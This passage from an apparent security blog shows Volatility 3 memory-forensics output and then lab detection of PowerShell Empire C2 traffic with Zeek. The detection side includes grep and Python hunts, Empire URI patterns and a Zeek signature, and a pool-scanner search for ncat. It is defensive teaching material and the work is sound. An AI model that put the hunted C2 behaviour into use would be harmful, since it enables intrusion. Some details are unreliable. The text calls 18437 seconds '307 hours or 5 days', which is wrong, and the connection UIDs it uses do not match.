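if __name__ == "__main__":
    for key, value in triage(SAMPLE_HEXDUMP).items():
        print(f"{key:14} {value}")
```

The same string and PE checks apply to a region written to disk with malfind's <i>--dump</i> option; read the file bytes instead of calling <i>parse_hexdump</i>.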
</div><div><br /></div><div><div>Testing to see if there is a Skeleton Key; the output below says "False".<br /><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.skeleton_key_check.Skeleton_Key_Check</span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Skeleton Key Found rc4HmacInitialize rc4HmacDecrypt</span>
<span style="color: white;">612 lsass.exe </span><span style="color: #fcff01;"><b>False </b></span><span style="color: white;">0x7ffe279d63c0 0x7ffe279d6800</span>
</pre></div>
</div><div><br /></div><p>Peeking into the <i>userassist</i>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.registry.userassist.UserAssist</span></b><span style="color: white;"> | more </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">Hive Offset Hive Name Path Last Write Time Type Name ID Count Focus Count Time Focused Last Updated Raw D</span>
<span style="color: white;">ata</span>
<span style="color: white;">0xe50a50363000 hive0xe50a50363000 - - - - - - - - - -</span>
<span style="color: white;">0xe50a5048a000 hive0xe50a5048a000 - - - - - - - - - -</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC</span>
<span style="color: white;">14-11DF-BB8C-A2F1DED72085}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{A3D53349-6E</span>
<span style="color: white;">61-4557-8FC7-0028EDCEEBF6}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{B267E3AD-A8</span>
<span style="color: white;">25-4A09-82B9-EEC22AA3B847}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{BCB48336-4D</span>
<span style="color: white;">DD-48FF-BB0B-D3190DACB3E2}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CAA59E3C-47</span>
<span style="color: white;">92-41A5-9909-6A6A8D32490E}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-AC</span>
<span style="color: white;">E2-4F4F-9178-9926F41749EA}\Count 2022-02-25 18:21:12.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">* 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEB</span>
<span style="color: white;">FF5CD-ACE2-4F4F-9178-9926F41749EA}\Count 2022-02-25 18:21:12.000000 Value UEME_CTLCUACount:ctor N/A 0 0 0:00:</span>
<span style="color: white;">00.500000 N/A</span>
<span style="color: white;">ff ff ff ff 00 00 00 00 ........</span>
<span style="color: white;">00 00 00 00 00 00 00 00 ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">ff ff ff ff 00 00 00 00 ........</span>
<span style="color: white;">00 00 00 00 00 00 00 00 ........</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Leveraging the pool scanner plugin.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.poolscanner.PoolScanner | grep -i ncat</span></b></span>
<span style="color: white;">symbol_table_name1!_EPROCESS 0xd187c11a5000inlayer_name ncat.exe</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c14adcf0 layer_name \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe</span>
<span style="color: white;">symbol_table_name1!_EPROCESS 0xd187c1af3000 layer_name ncat.exe</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e11b60 layer_name \ProgramData\chocolatey\bin\ncat.exe</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e27960 layer_name \Windows\Prefetch\NCAT.EXE-4B4B887F.pf</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e2a200 layer_name \ProgramData\chocolatey\bin\ncat.exe</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e326d0 layer_name \Windows\Prefetch\NCAT.EXE-1B3976EF.pf</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e347a0 layer_name \ncat-0</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e34930 layer_name \ncat-0</span>
</pre></div>
</div><div><br />Extracting certificate information.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.registry.certificates.Certificates</span></b><span style="color: white;"> | more </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">Certificate path Certificate section Certificate ID Certificate name</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 02FAF3E291435468607857694DF5E45B68851868 Sectigo (AddTrust)</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 DigiCert</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 07E032E020B72C3F192F0628A2593A19A70F069E Certum Trusted Network CA</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 2796BAE63F1801E277261BA0D77770028F20EEE4 Go Daddy Class 2 Certification Authority</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Sectigo</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 3679CA35668772304D30A5FB873B0FA77BB70D54 VeriSign Universal Root Certification Authori</span>
<span style="color: white;">ty</span>
</pre></div>
</div><div><br /></div><div>Good enough for me at this point. I have a good enough understanding of how to use Volatility 3.<br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PEN<br /><br /><b>Powershell Empire - Detection with Zeek</b> (2022-02-02)<br /><br />Transitioning to Zeek, let's now see what we can learn from a quick analysis.
First up, the version of Zeek I'm using.
<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# zeek4 --version</span>
<span style="color: white;">zeek4 version 4.2.0-dev.448</span>
</pre></div><br />Let's look at this from three different perspectives. First, let's simply run Zeek and search the logs it creates for our Indicators of Compromise (IoCs).
Running Zeek against the pcap file.<div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# zeek --no-checksums -r /home/securitynik/packets/empire-full-session.pcap </span>
</pre></div>
</div><div><br /></div><div><div>Looking at the logs created.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# ls *.log</span>
<span style="color: white;">conn.log dns.log files.log http.log packet_filter.log pe.log reporter.log ssh.log weird.log</span>
</pre></div>
</div><div><br /></div><div><div>In a production environment, you will have many more logs, so we don't want to go through all of them. Let's leverage grep to find our IoCs.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# grep --perl-regexp "\/(?i)(news|login|admin).*?php" *.log --color=always | more</span>
<span style="color: white;">...</span>
<span style="color: white;">http.log:1637431443.514058 CcC0YB2heOkR9Gnpi4 10.0.0.110 1650 10.0.0.107 443 3 POST 10.0.0.107</span>
<span style="color: white;">/news.php - 1.1 securitynik-launcher-bat-User-Agent - 206 44506 200 OK - - (empty) - - - F4wiHG1bpwW03v71vh - - FghBlt1qKU0utYSHd7 - -</span>
<span style="color: white;">http.log:1637431506.697538 CcC0YB2heOkR9Gnpi4 10.0.0.110 1650 10.0.0.107 443 4 GET 10.0.0.107</span>
<span style="color: white;">/admin/get.php - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 1279 200 OK - - (empty) - - - - - - FvSNLf3mGluOXZ5Qu - text/html</span>
<span style="color: white;">http.log:1637431566.836488 CcC0YB2heOkR9Gnpi4 10.0.0.110 1650 10.0.0.107 443 5 GET 10.0.0.107</span>
<span style="color: white;">/login/process.php - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 1279 200 OK - -(empty) - - - - - - F6xbg04XsiJmRygrwc - text/html</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>At this point, we have identified that Zeek has logs pertaining to this activity. Let's figure out which logs this activity is found in.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# grep --perl-regexp "\/(?i)(news|login|admin).*?php" *.log | awk --field-separator ':' '{ print $1 }' | sort | uniq --count | sort --numeric --reverse </span>
<span style="color: white;"> 1807 http.log</span>
</pre></div>
</div><div><br /></div><div><div>Looks like the activity was only seen in http.log. Focusing here a bit more, let's extract a few key fields.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# zeek-cut -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p method host uri < http.log | grep --perl-regexp "\/(?i)(news|login|admin).*?php"</span>
<span style="color: white;">ts uid id.orig_h id.orig_p id.resp_h id.resp_p method host uri</span>
<span style="color: white;">....</span>
<span style="color: white;">2021-11-20T20:21:40-0500 Cp6N4630HCYa17LUa8 10.0.0.110 1697 10.0.0.107 443 GET 10.0.0.107 /news.php</span>
<span style="color: white;">2021-11-20T20:22:20-0500 CwazkE3YeyHUnSxQ7f 10.0.0.110 1723 10.0.0.107 443 GET 10.0.0.107 /admin/get.php</span>
<span style="color: white;">2021-11-20T20:22:38-0500 C9qPFB1lfO6u42p4G3 10.0.0.110 1699 10.0.0.107 443 GET 10.0.0.107 /login/process.php</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Picking the first UID, to see where else this activity shows up.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# grep "Cp6N4630HCYa17LUa8" *.log | cut --fields 1 --delimiter ":" | sort | uniq --count | sort --numeric --reverse</span>
<span style="color: white;"> 315 files.log</span>
<span style="color: white;"> 311 http.log</span>
<span style="color: white;"> 1 conn.log</span>
</pre></div>
</div><div><br /></div><div>Looking at the single entry in conn.log: while there is a lot to see, extracting a few fields and looking at the duration shows this activity lasted 18437.626252 seconds or 307 hours or 5 days.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# zeek-cut -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes < conn.log | grep "C9qPFB1lfO6u42p4G3" </span>
<span style="color: white;">2021-11-20T18:02:04-0500 C9qPFB1lfO6u42p4G3 10.0.0.110 1699 10.0.0.107 443 tcp http 18437.626252 55444 462342</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the files.log, I did not really find anything of interest. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# grep "Cp6N4630HCYa17LUa8" files.log | more</span>
<span style="color: white;">1637449322.213963 FbvsAO3tTXJzOyuaj4 10.0.0.107 10.0.0.110 Cp6N4630HCYa17LUa8 HTTP 0 (empty) text/html - 0.000479 - F 1279 1279 0 0 F - - - - - -</span>
<span style="color: white;"> -</span>
<span style="color: white;">1637449382.306875 FkJSID2jB0CMQfrcZb 10.0.0.107 10.0.0.110 Cp6N4630HCYa17LUa8 HTTP 0 (empty) text/html - 0.000484 - F 1279 1279 0 0 F - - - - - -</span>
<span style="color: white;"> -</span>
<span style="color: white;">1637449442.421711 F4DJ7Z1wfsWwZ0INka 10.0.0.107 10.0.0.110 Cp6N4630HCYa17LUa8 HTTP 0 (empty) text/html - 0.000375 - F 1279 1279 0 0 F - - - - - -</span>
<span style="color: white;"> -</span>
<span style="color: white;">1637449502.518040 Fnn8vklGr2q1mTGt2 10.0.0.107 10.0.0.110 Cp6N4630HCYa17LUa8 HTTP 0 (empty) text/html - 0.000484 - F 1279 1279 0 0 F - - - - - -</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>Additionally, no files were actually extracted, as can be seen by the absence of the extracted folder.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# ls -l extracted_files/</span>
<span style="color: white;">ls: cannot access 'extracted_files/': No such file or directory</span>
</pre></div>
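<div><br /></div><div>Before moving on, here is an added example (not from the original post) that does the same hunt in Python: a small reader for Zeek's TSV log format, the same IoC regex as the grep above, and a per-uid summary of the matching requests. The http.log excerpt inside it is constructed, modelled on the rows shown above; the uid Cxyz0000000000000 and its /index.html row are a made-up control that should not match.</div>

```python
"""Hunt a Zeek http.log for the PowerShell Empire URI IoCs used above.

Added example, not from the original post: a reader for Zeek's TSV log
format plus the same IoC regex the grep command used, summarising hits per
connection uid. SAMPLE_HTTP_LOG is constructed, modelled on the page's output.
"""
import re
from collections import defaultdict

# Same IoC as the grep: /news, /login or /admin ... followed by php (case-insensitive)
EMPIRE_URI = re.compile(r"/(?i:news|login|admin).*?php")

# Constructed http.log excerpt in Zeek TSV format. Columns are trimmed to the
# ones used here; a full-width log parses the same way because the column
# names come from the #fields header rather than being hard-coded.
IE11_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
SAMPLE_HTTP_LOG = (
    "#separator \\x09\n"
    "#set_separator\t,\n"
    "#empty_field\t(empty)\n"
    "#unset_field\t-\n"
    "#path\thttp\n"
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tmethod\thost\turi\tuser_agent\tstatus_code\n"
    "#types\ttime\tstring\taddr\tport\taddr\tport\tstring\tstring\tstring\tstring\tcount\n"
    "1637431443.514058\tCcC0YB2heOkR9Gnpi4\t10.0.0.110\t1650\t10.0.0.107\t443\tPOST\t10.0.0.107\t/news.php\tsecuritynik-launcher-bat-User-Agent\t200\n"
    f"1637431506.697538\tCcC0YB2heOkR9Gnpi4\t10.0.0.110\t1650\t10.0.0.107\t443\tGET\t10.0.0.107\t/admin/get.php\t{IE11_UA}\t200\n"
    f"1637431566.836488\tCcC0YB2heOkR9Gnpi4\t10.0.0.110\t1650\t10.0.0.107\t443\tGET\t10.0.0.107\t/login/process.php\t{IE11_UA}\t200\n"
    "1637449322.213963\tCp6N4630HCYa17LUa8\t10.0.0.110\t1697\t10.0.0.107\t443\tGET\t10.0.0.107\t/news.php\t-\t200\n"
    f"1637449330.000000\tCxyz0000000000000\t10.0.0.110\t1700\t10.0.0.107\t443\tGET\t10.0.0.107\t/index.html\t{IE11_UA}\t200\n"
    "#close\t2021-11-20-20-30-00\n"
)


def parse_zeek_tsv(text):
    """Yield one dict per data row, keyed by the names in the #fields header.

    Honours the #separator and #unset_field directives; unset values ('-')
    become None so callers can tell "absent" from a literal string.
    """
    sep, unset, fields = "\t", "-", None
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#separator "):
                # Zeek writes the separator escaped, e.g. "\x09" for a tab
                sep = line.split(" ", 1)[1].encode().decode("unicode_escape")
            else:
                key, _, value = line[1:].partition(sep)
                if key == "unset_field":
                    unset = value
                elif key == "fields":
                    fields = value.split(sep)
            continue
        if fields is None:
            raise ValueError("data row seen before the #fields header")
        yield {k: (None if v == unset else v)
               for k, v in zip(fields, line.split(sep))}


def hunt_empire_uris(http_log_text):
    """Group requests whose uri matches EMPIRE_URI by connection uid.

    Each entry carries the hit count, the distinct URIs and user agents, and
    the endpoints, mirroring the grep/zeek-cut pivot done by hand above.
    """
    hits = defaultdict(lambda: {"count": 0, "uris": set(), "user_agents": set(),
                                "src": None, "dst": None})
    for rec in parse_zeek_tsv(http_log_text):
        uri = rec.get("uri")
        if uri is None or not EMPIRE_URI.search(uri):
            continue
        h = hits[rec["uid"]]
        h["count"] += 1
        h["uris"].add(uri)
        if rec.get("user_agent") is not None:
            h["user_agents"].add(rec["user_agent"])
        h["src"] = f"{rec['id.orig_h']}:{rec['id.orig_p']}"
        h["dst"] = f"{rec['id.resp_h']}:{rec['id.resp_p']}"
    return dict(hits)


def non_browser_user_agents(summary):
    """Heuristic: user agents on matching requests that do not start with
    'Mozilla/'. The first POST above carried a custom launcher string that a
    browser-only baseline would never produce."""
    return {ua for h in summary.values() for ua in h["user_agents"]
            if not ua.startswith("Mozilla/")}


if __name__ == "__main__":
    summary = hunt_empire_uris(SAMPLE_HTTP_LOG)
    for uid, h in sorted(summary.items(), key=lambda kv: -kv[1]["count"]):
        print(f"{uid} {h['src']} -> {h['dst']} hits={h['count']} uris={sorted(h['uris'])}")
    print("Non-browser user agents:", sorted(non_browser_user_agents(summary)))
```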
</div><div><br /></div><div><div>We can spend more time poking around. However, the objective was to do some basic detection, and we have achieved that.</div><div><br /></div><div><b>Second, let's take a look at a Zeek signature to detect our IoCs.</b></div><div><br /></div><div>While Zeek can be used for signature detection, it is not the recommended way to use Zeek. However, since it does provide the capability to perform some basic signature-based detection, let's take advantage of this feature.</div><div><br /></div><div>There are a couple of different ways to do this. Let's take one.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># This signature is about detecting PowerShell Empire in my lab</span>
<span style="color: white;">signature powershellEmpire</span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> # Look at IP header offset 9 (the protocol field) for 0x06, i.e. TCP</span>
<span style="color: white;"> header ip[9] == 0x06</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> </span><span> </span># Look for the source address representing our protected network</span>
<span style="color: white;"> # Look at the IP header, start at offset 12 and span 4 bytes for</span>
<span style="color: white;"> # the source IP</span>
<span style="color: white;"> header ip[12:4] == 10.0.0.110/32</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Look for the destination address </span>
<span style="color: white;"> # Look at the IP header, start at offset 16 and span 4 bytes for</span>
<span style="color: white;"> # the destination IP </span>
<span style="color: white;"> # Treat anything not destined for 10.0.0.110/32 as something we don't own.</span>
<span style="color: white;"> header ip[16:4] != 10.0.0.110/32</span>
<span style="color: white;"> </span>
<span style="color: white;"> #</span><span style="color: white;"> Look for destination port 443</span>
<span style="color: white;"> header tcp[2:2] == 443</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Look for the ASCII strings news or admin or login followed by php</span>
<span style="color: white;"> http /.*(news|admin|login).*\.php/</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Ensure the 3-way handshake has completed and</span>
<span style="color: white;"> # The traffic is coming from an originator</span>
<span style="color: white;"> tcp-state established,originator </span>
<span style="color: white;"> </span>
<span style="color: white;"> # Generate an event</span>
<span style="color: white;"> event "SUSPICIOUS POSSIBLE Powershell Empire Activity"</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> </span>}</span>
</pre></div>
</div><div><br /></div><div>Running Zeek</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp]</span>
<span style="color: white;">└─# zeek --readfile /home/securitynik/packets/empire-full-session.pcap --rulefile /home/securitynik/packets/powershell.sig --no-checksums</span>
</pre></div>
</div><div><br /></div><div><div>Verifying the files created </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp]</span>
<span style="color: white;">└─# ls *.log</span>
<span style="color: white;">conn.log dns.log files.log http.log notice.log packet_filter.log pe.log signatures.log ssh.log weird.log</span>
</pre></div>
</div><div><br /></div><div><div>Taking a look at the signatures.log file, we see ...</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp]</span>
<span style="color: white;">└─# zeek-cut -d -m < signatures.log </span>
<span style="color: white;">ts uid src_addr src_port dst_addr dst_port note sig_id event_msg sub_msg sig_count host_count</span>
<span style="color: white;">2021-11-20T13:03:59-0500 CskRYg2jaNXRC0fLy8 10.0.0.110 1650 10.0.0.107 443 Signatures::Sensitive_Signature powershellEmpire 10.0.0.110: SUSPICIOUS POSSIBLE Powershell Empire Activity /news.php - -</span>
<span style="color: white;">2021-11-20T16:03:25-0500 Ckr2TD12vYGon6LR58 10.0.0.110 1686 10.0.0.107 443 Signatures::Sensitive_Signature powershellEmpire 10.0.0.110: SUSPICIOUS POSSIBLE Powershell Empire Activity /admin/get.php - -</span>
<span style="color: white;">2021-11-20T16:51:53-0500 CI3BQ34gmAYusuQ6Yf 10.0.0.110 1689 10.0.0.107 443 Signatures::Sensitive_Signature powershellEmpire 10.0.0.110: SUSPICIOUS POSSIBLE Powershell Empire Activity /login/process.php - -</span>
<span style="color: white;">2021-11-20T17:12:48-0500 CT0hHi3BBoldu0NY3e 10.0.0.110 1690 10.0.0.107 443 Signatures::Sensitive_Signature </span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the notice.log we see ...</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp]</span>
<span style="color: white;">└─# zeek-cut -d -m < notice.log | more</span>
<span style="color: white;">ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions suppress_for remote_location.country_code remote_location.region remote_location.city remote_location</span>
<span style="color: white;">.latitude remote_location.longitude</span>
<span style="color: white;">2021-11-20T13:03:59-0500 CskRYg2jaNXRC0fLy8 10.0.0.110 1650 10.0.0.107 443 - - - tcp Signatures::Sensitive_S</span>
<span style="color: white;">ignature 10.0.0.110: SUSPICIOUS POSSIBLE Powershell Empire Activity /news.php 10.0.0.110 10.0.0.107 443 - - Notice:</span>
<span style="color: white;">:ACTION_LOG 3600.000000 - - - - -</span>
<span style="color: white;">...</span>
</pre></div>
